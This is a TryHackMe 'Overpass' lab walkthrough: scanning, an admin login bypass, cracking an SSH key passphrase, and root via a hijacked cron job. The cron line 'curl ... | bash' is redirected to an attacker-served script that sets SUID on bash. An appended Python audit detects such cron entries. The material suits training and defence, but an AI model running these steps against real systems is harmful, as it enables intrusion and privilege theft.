TryHackMe - Overpass

Overpass

Hello guys, welcome back again with another walkthrough! This time we're moving through a box called "Overpass" from TryHackMe.

Come on guys, let's move to the TryHackMe website, log in with your credentials, then go to the Learn option, search for "Overpass", select it and join the room. Before starting the machine you need to establish a connection to the TryHackMe server using OpenVPN. For that, click on the profile avatar ➡ Access ➡ Download my configuration file. Next, open your terminal and run these cmds:

➡ ls

➡ cd Downloads

➡ ls

➡ sudo openvpn (filename)

Now our OpenVPN connection is established. Go back to the THM website and select 'Start Machine'; you will get an IP. Copy that IP, open a new terminal and switch to the root user with the cmd: sudo su.

Scanning & Enumeration:

➡ ping 10.10.137.248

➡ nmap -A 10.10.137.248

The aggressive scan shows that ports 22 (SSH) and 80 (HTTP) are open. Now open a browser and visit that IP:

Directory Brute-Forcing:

We can't find any useful information on this page, so we go back to our terminal and use gobuster to find more.

➡ gobuster dir -u http://10.10.137.248/ -w /usr/share/wordlists/dirb/common.txt


Exploitation:

After running gobuster we get /admin, so we visit 10.10.137.248/admin. A login page opens, and we are going to get past that login page using Burp Suite. After that we get the username james and an RSA private key like this:

Copy the rsa key, open terminal and save it:

➡ nano ssh.key

➡ ls

➡ cat ssh.key


Gaining Access:

➡ ssh -i ssh.key james@10.10.137.248

It prompts for a passphrase for ssh.key, but we don't have one.

➡ locate ssh2john.py

➡ /usr/share/john/ssh2john.py ssh.key

We are going to save this hash output as hash.key.

➡ /usr/share/john/ssh2john.py ssh.key > hash.key

➡ ls

➡ cat hash.key


Now we are going to crack the passphrase from this hash file using john:

➡ john hash.key


We get the passphrase for ssh.key: james13

Open new terminal and run cmd:

➡ sudo su

➡ ssh -i ssh.key james@10.10.137.248

User flag:

Now we are inside james@overpass-prod, and we run some familiar cmds:

➡ ls

➡ cat user.txt

➡ cat todo.txt


We successfully get the user flag! Copy and paste it on the THM Overpass page.

Privilege Escalation:

First, try sudo -l to check what we can run as root, but we can't run anything as root. Then we run some cmds:

➡ cat /etc/crontab

➡ cat /etc/hosts

After this we need to change the IP of overpass.thm to our tun IP. For that, edit /etc/hosts with the cmd below and replace the address with our tunnel IP.

➡ nano /etc/hosts


We can check the change we made with the cat cmd.

To make it work properly we need to recreate the directory structure used in the curl cmd. Start by creating the directories:

➡ mkdir -p overpass.thm/downloads/src

Inside the src directory, create a file:

➡ touch buildscript.sh

In the text editor we add the command we want the target machine to execute after the curl output is piped to bash.

The easiest way to escalate our privileges is to set the SUID bit on bash:

➡ nano buildscript.sh

Root flag:

Start a Python web server on your machine in the overpass.thm folder:

➡ python3 -m http.server 80

You will see a request in the server output when the target machine connects to download the script.

Wait a minute for the cron job to run, then get root:

➡ /bin/bash -p

➡ whoami

➡ cd /root


Grab the root flag!
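The cron job abused above (a root cron entry that fetches overpass.thm/downloads/src/buildscript.sh over plain HTTP and pipes it into bash, with the name resolved through a writable /etc/hosts) is exactly the pattern a defender should hunt for on their own hosts. The following Python audit is an added example, not part of the original walkthrough; the crontab and hosts entries it scans are constructed samples modelled on what the text describes, and the regex heuristics are my own.

```python
import re

# Constructed samples shaped like the entries the write-up describes (not captured from the box).
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
"""
SAMPLE_HOSTS = """\
127.0.0.1 localhost
10.10.10.10 overpass.thm
"""

# A download tool whose output is piped, in the same pipeline, into a shell interpreter;
# then the first URL-like token in its arguments (scheme optional: curl defaults to http).
PIPE_TO_SHELL = re.compile(r'\b(?:curl|wget)\b(?P<args>[^|;&]*)\|\s*(?:sudo\s+)?(?:ba|da|z)?sh\b')
URL_OR_HOST = re.compile(r'(?:(?P<scheme>https?)://)?(?P<host>[A-Za-z0-9.-]+\.[A-Za-z]{2,})(?::\d+)?/')


def parse_hosts(hosts_text):
    """Return every hostname that /etc/hosts resolves locally (bypassing DNS)."""
    names = set()
    for line in hosts_text.splitlines():
        fields = line.split('#', 1)[0].split()
        if len(fields) >= 2:
            names.update(fields[1:])
    return names


def audit_crontab(crontab_text, hosts_text):
    """One finding per system-crontab entry that pipes a download straight into a shell."""
    local_names = parse_hosts(hosts_text)
    findings = []
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith('#'):
            continue
        fields = line.split(None, 6)  # m h dom mon dow user command
        if len(fields) < 7:
            continue
        user, command = fields[5], fields[6]
        hit = PIPE_TO_SHELL.search(command)
        if not hit:
            continue
        url = URL_OR_HOST.search(hit.group('args'))
        host = url.group('host') if url else None
        findings.append({
            'line': lineno, 'user': user, 'host': host,
            # No TLS: anyone who controls the path (or the name) controls the script.
            'plain_http': url is not None and url.group('scheme') != 'https',
            # Name resolved from /etc/hosts: whoever can write that file picks the source.
            'hosts_file_resolved': host in local_names,
        })
    return findings
```

Run it against the real /etc/crontab and /etc/hosts of a box you administer; a root entry flagged with both plain_http and hosts_file_resolved true is the Overpass misconfiguration, and the fix is to stop piping downloads into a shell (or at least pin to https and a verified checksum) and to keep /etc/hosts root-owned and mode 644.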
